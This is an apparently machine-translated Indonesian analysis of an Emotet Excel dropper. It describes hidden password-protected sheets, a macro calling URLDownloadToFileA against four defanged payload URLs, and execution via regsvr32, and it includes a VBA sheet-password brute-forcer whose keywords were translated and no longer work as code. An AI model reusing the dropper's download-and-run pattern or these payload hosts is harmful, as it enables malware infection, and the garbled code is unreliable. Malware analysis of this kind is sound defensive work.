Kampanye Emotet:
Oleh Ilan Duhin dan Yossi Poberezsky( @pober58 )
Ringkasan bisnis plan:
Dalam beberapa bulan terakhir, ada kampanye ekstensif di Eropa, terutama malware yang disebut "Emotet". Malware datang sebagai file Excel dan mencoba berkomunikasi dengan sejumlah URL dan pada akhirnya, mengunduh empat file DLL ke mesin.
Emotet menggunakan panggilan API CreateDirectoryA untuk membuat folder tempat file akan disimpan secara lokal di komputer dan dari sana dijalankan melalui Regsvr32.exe.
Analisis Statis:
Alat OLE:
Memeriksa struktur file.
Mendapatkan petunjuk yang kita miliki di dalam lembar excel 6.
Memeriksa kemampuan file dengan menggunakan malwoverview.py dan mendapatkan beberapa petunjuk.
Masuk ke aliran ketiga dan ekstrak senarnya.
Temukan 4 URL yang mencurigakan.
File tersebut berisi makro. Selain itu, temukan semua sel yang berisi seluruh kode.
Analisis Dinamis:
Pertama, kami telah mencoba membuka excel (bagian dari office 2021) kami melihat bahwa itu dibuka tanpa
Munculan "Aktifkan Konten". setelah melakukan sedikit riset, pesan tersebut hanya muncul di Office versi 2007–2013. Setelah itu, Microsoft memblokir opsi untuk mengaktifkan makro yang berjalan secara otomatis.
Untuk mengaktifkan macro kita perlu mengubah opsi seperti pada gambar di bawah ini:
** di office 2007/2013 akan dijalankan dengan mengklik “Enable Content”
Perlu menyimpan dan memasukkannya lagi ke file excel.
Dan sekarang…
Saat kami menekan tombol, empat pesan muncul.
Saat mengklik regsvr32.exe Anda dapat melihat makro tersebut menggunakannya untuk mengeksekusi malware. Kerjanya seperti dropper karena menghasilkan folder untuk menempatkan DLL-nya di sana.
saat membuka Excel dan mengikuti penyelidikan statis, kami melihat 6 lembar yang disembunyikan dari korban.
Setiap lembar membutuhkan kata sandi.
Untuk mengekstrak kata sandi, kami menggunakan "pemecah kata sandi untuk VBA".
Sumber:https://www.instructables.com/VBA-Code-To-Unlock-A-Locked-Excel-Sheet/
Sub Pemecah Kata Sandi()
'Menghancurkan perlindungan kata sandi lembar kerja.
Dim i Sebagai Integer, j Sebagai Integer, k Sebagai Integer
Dim l Sebagai Integer, m Sebagai Integer, n Sebagai Integer
Dim i1 Sebagai Integer, i2 Sebagai Integer, i3 Sebagai Integer
Dim i4 Sebagai Integer, i5 Sebagai Integer, i6 Sebagai Integer
Pada Kesalahan Lanjutkan Berikutnya
Untuk i = 65 Sampai 66: Untuk j = 65 Sampai 66: Untuk k = 65 Sampai 66
Untuk l = 65 Sampai 66: Untuk m = 65 Sampai 66: Untuk i1 = 65 Sampai 66
Untuk i2 = 65 Sampai 66: Untuk i3 = 65 Sampai 66: Untuk i4 = 65 Sampai 66
Untuk i5 = 65 Sampai 66: Untuk i6 = 65 Sampai 66: Untuk n = 32 Sampai 126
Lembar Aktif.Buka proteksi Chr(i) & Chr(j) & Chr(k) & _
Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _
Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
Jika ActiveSheet.ProtectContents = Salah Lalu
MsgBox “Sandi yang bisa digunakan adalah “ & Chr(i) & Chr(j) & _
Chr(k) & Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & _
Chr(i3) & Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
Keluar Sub
Berakhir jika
Selanjutnya: Selanjutnya: Selanjutnya: Selanjutnya: Selanjutnya: Selanjutnya
Selanjutnya: Selanjutnya: Selanjutnya: Selanjutnya: Selanjutnya: Selanjutnya
Akhir Sub
Untuk memasukkan kode VBA kami, kami perlu menekan: ALT + F11, rekatkan dan Jalankan.
rekatkan pemecah kata sandi di dalam setiap lembar.
Excel secara otomatis menunjukkan kata sandi untuk lembar yang diminta.
Kami dapat memverifikasinya dengan menekan klik kanan dan melihat bahwa lembar tersebut "Dilindungi".
Lembar 1 data:
Lembar 2 data:
Saat kami mengatur ulang string, kami melihat empat URL:
- URLDownloadToFileA”, “JCCB”, 0, “https://audioselec.c[o]m/about/dDw5ggtyMojggTqhc
-https://geringer-muehle.[de]/wp-admin/G/
-http://intolove.co.[uk]/wp-admin/FbGhiWtrEzrQ/
-http://isc.net.[ua]/themes/3rU/
Lembar 3 data:
Lembar 4 data:
Dua URL lain yang kita lihat sebelumnya.
Lembar 5 data:
Lembar 6 data:
Berisi petunjuk cara meringkas string.
Analisis DLL:
Fungsi ekspor nomor 18.
Setelah mengolok-olok DLL, kami menemukan beberapa string menarik di tab memori.
Selain itu, ia turun dengan sendirinya saat dieksekusi ke jalur berikutnya:
Saat menganalisis string memori DLL di VT, kami mendapat deskripsi Emotet.
Kesimpulan:
· Makro menjangkau untuk mengunduh & menjalankan malware Emotet.
· File excel menggunakan makro untuk menjangkau URL web.
· Via regsvr32.exe Emotet melakukan eksekusinya.
· Emotet dropper diunduh ke folder yang dibuat secara acak di bawah %UserProfile%\Appdata\Local sebagai file dll.

![Apa itu Linked List? [Bagian 1]](https://post.nghiatu.com/assets/images/m/max/724/1*Xokk6XOjWyIGCBujkJsCzQ.jpeg)



































